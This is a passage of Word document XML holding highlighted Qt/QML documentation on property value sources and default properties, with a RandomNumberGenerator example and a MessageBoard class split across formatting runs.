          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prop</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m_targetProperty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prop</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signals</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> maxValueChanged</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private</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> slots</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> updateProperty</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m_targetProperty</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write</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qrand</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m_maxValue</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private</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QQmlProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_targetProperty</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QTimer</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_timer</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_maxValue</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When the QML </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC28D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> encounters a use of</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RandomNumberGenerator</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">as a property value source, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC28D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>invokes</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RandomNumberGenerator::</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC28D6">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setTarget()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to provide the type with the property to which the value source has been applied. When the internal timer in</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RandomNumberGenerator</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>triggers every 500 milliseconds, it will write a new number value to that specified property.</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Once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RandomNumberGenerator</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">class </w:t>
      </w:r>
      <w:r w:rsidRPr="00815B1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>has been registered</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the QML type system, it can be used from QML as a property value source. Below, it is used to change the width of a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId260" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>every 500 milliseconds:</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import</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QtQuick</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2.0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lastRenderedPageBreak/>
        <w:t>Item</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width</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300</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height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300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Rectangle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RandomNumberGenerator</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on width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maxValue</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300</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height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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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color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"red"</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815B1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In all other respects, property value sources </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA192B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are regular QML types</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can have properties, signals methods and so on, but with the added capability that they can be used to change property values using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&lt;PropertyValueSource&gt; on &lt;property&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00815B1A" w:rsidRDefault="00DA77C2" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When a property value source object is assigned to a property, QML first tries to assign it normally, as though it were a regular QML type. Only if this assignment fails does the engine call the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId261" w:anchor="setTarget" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>setTarget()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>method. This allows the type to also be used in contexts other than just as a value source.</w:t>
      </w:r>
      <w:r w:rsidR="00815B1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00815B1A" w:rsidRPr="00815B1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Value source as ordinary type and its realization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00FA192B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="311" w:name="specifying-default-properties-for-qml-ob"/>
      <w:bookmarkStart w:id="312" w:name="_Toc483000598"/>
      <w:bookmarkStart w:id="313" w:name="_Toc483003615"/>
      <w:bookmarkStart w:id="314" w:name="_Toc483603951"/>
      <w:bookmarkStart w:id="315" w:name="_Toc483605171"/>
      <w:bookmarkEnd w:id="311"/>
      <w:r w:rsidRPr="00FA192B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Specifying Default Properties for QML Object Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="312"/>
      <w:bookmarkEnd w:id="313"/>
      <w:bookmarkEnd w:id="314"/>
      <w:bookmarkEnd w:id="315"/>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Any</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId262" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-derived type that is registered as an instantiable QML object type can optionally </w:t>
      </w:r>
      <w:r w:rsidRPr="00790650">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>specify a</w:t>
      </w:r>
      <w:r w:rsidRPr="00790650">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00790650">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default property</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for the type. A </w:t>
      </w:r>
      <w:r w:rsidRPr="00790650">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default property is</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the property to which an object's children are automatically assigned if they are not assigned to any specific property.</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The default property can be set by calling the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId263" w:anchor="Q_CLASSINFO" w:history="1">
        <w:r w:rsidRPr="00790650">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_CLASSINFO</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() macro for a class with a specific "</w:t>
      </w:r>
      <w:r w:rsidRPr="00790650">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DefaultProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" value. For example,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MessageBoard</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class below specifies its</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messages</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property as the default property for the class:</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class</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MessageBoard</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public</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QObject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Q_OBJECT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Q_PROPERTY</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlListProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> messages READ messages</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Q_CLASSINFO</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"DefaultProperty"</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"messages"</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public</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QQmlListProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> messages</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const</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private</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QList</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Message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*&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
